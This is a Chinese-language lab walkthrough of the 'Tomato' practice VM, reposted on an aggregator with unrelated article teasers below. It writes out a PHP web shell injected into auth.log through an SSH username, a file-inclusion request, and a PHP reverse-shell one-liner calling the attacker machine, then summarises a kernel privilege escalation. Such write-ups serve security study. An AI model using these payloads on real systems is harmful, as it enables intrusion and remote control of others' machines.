tomato

news/2024/10/2 12:23:43
21,80,2211,88888
 
爆破目录
 
访问 http://192.168.52.129/antibot_image/ 发现存在目录 antibots,接着访问该目录,发现存在很多文件
 
 
访问 http://192.168.52.129/antibot_image/antibots/info.php,找到 phpinfo 的信息,F12查看源码发现 hint,存在文件包含漏洞
 
前面信息搜集时发现开放了 2211 端口,服务为 ssh,尝试对日志文件写入 shell,然后包含日志文件

先查看日志文件是不是在默认路径:http://192.168.52.129/antibot_image/antibots/info.php?image=/var/log/auth.log

 

利用 ssh 连接,写入一句话木马:ssh '<?php system($_GET['H3rmesk1t']);?>'@192.168.52.129 -p 2211

验证PHP代码是否注入成功:访问http://192.168.52.129/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log&cmd=ls

 
尝试getshell,利用php反弹shell,Kali攻击机利用nc监听4444端口
 
PHP反弹shell代码如下:
php -r '$sock=fsockopen("192.168.52.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
进行url编码后得到
php+-r+%27%24sock%3dfsockopen(%22192.168.52.128%22%2c4444)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
成功getshell:
 
变成交换模式
python3 -c "import pty;pty.spawn('/bin/bash')"
 
查看操作系统内核
 
在网上查看对应的exp
 
查看生成的exp
 
使用python开启一个临时http服务器
 
靶机切换到tmp目录下,下载exp,并给予执行的权限
 
 
执行exp,成功提升为root权限,切换到其root目录下面,成功获得flag,Tomato靶机渗透结束
 
 
 
 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hjln.cn/news/44818.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

恒隆云上配置One-2-3-45

前ICPC算法竞赛退役选手|现摸鱼ing

OceanBase主机CPU超过85% SQL性能急剧下降案例

之前在培训的时候,OceanBase的老师就说过,当主机CPU使用率超过85%之后,SQL的就会急剧下降。最近分析问题的时候刚好碰到相关案例,简单记录下 ocp记录的主机CPU相关信息如下问题SQL的执行情况: 从下面的SQL执行情况可以看到,在6-1号的时候问题SQL在下午六点半开始执行,平…

HTTP1.x HTTP2 HTTP3 的简单对比

协议 简要描述 比喻HTTP1.0 短连接,一次数据通信,结束后就断开 一次性道路,简单暴力通过。HTTP1.1 长连接,连接可以被复用,但需要按照资源顺序复用。 单向单车道,婚礼车队,不能逆序。HTTP2 连接复用,增加了http头部压缩和帧传输,连接可以被异步服用,服务器端可以主动…

首批!华为云盘古研发大模型通过代码大模型评估,获当前最高等级

在通用能力、专用场景能力应用成熟度三个能力域上均获优异结果。本文分享自华为云社区《首批!华为云盘古研发大模型通过代码大模型评估,获当前最高等级》,作者: 华为云头条。 近日,在中国信通院组织的首轮代码大模型评估中,华为技术有限公司的华为云盘古研发大模型最终获…

技能

①word文档编辑时,缩小界面时旁边的空白部分怎么移除:使用视图的web或者大纲模式即可②如何将ted的英文和中文文稿,全篇设置成一句一句对应的文章:

物理隔离后数据怎么导入和导出?安全U盘一键解决

政府单位、军工和科研所、航空航天企业、金融机构、医疗单位、电力企业、生物制药实验室等企业及单位,因研发和生产过程、或日常经营中涉及大量敏感信息和技术,需要通过物理隔离来确保网络的安全性。因此,多采用物理隔离的方式进行网络建设。物理隔离后,仍有数据需要交换,…

龙哥量化:通达信一针见血选股指标公式源码

如果您需要代写公式, 请联系我。 龙哥QQ:591438821 龙哥微信:Long622889 X_1:=HIGH>MAX(OPEN,CLOSE)*1.03 AND Abs(CLOSE-OPEN)/REF(CLOSE,1)<0.04;X_2:=REF(BArslASTCOUNT(X_1),1)>=2;X_3:=CLOSE>OPEN AND CLOSE>REF(HHV(HIGH,2),1);X_4:=MA(CLOSE,5)>MA…

龙哥量化:通达信成交量盘口指标公式源码

如果您需要代写公式, 请联系我。 龙哥QQ:591438821 龙哥微信:Long622889WJ:=(HIGH+LOW+CLOSE)/3;V1:=IF(HIGH=LOW,1,HIGH-MAX(OPEN,CLOSE));V2:=IF(HIGH=LOW,1,MAX(CLOSE,OPEN)-WJ);V3:=IF(HIGH=LOW,1,MIN(OPEN,CLOSE)-LOW);V4:=IF(HIGH=LOW,1,WJ-MIN(CLOSE,OPEN));V5:=vol/…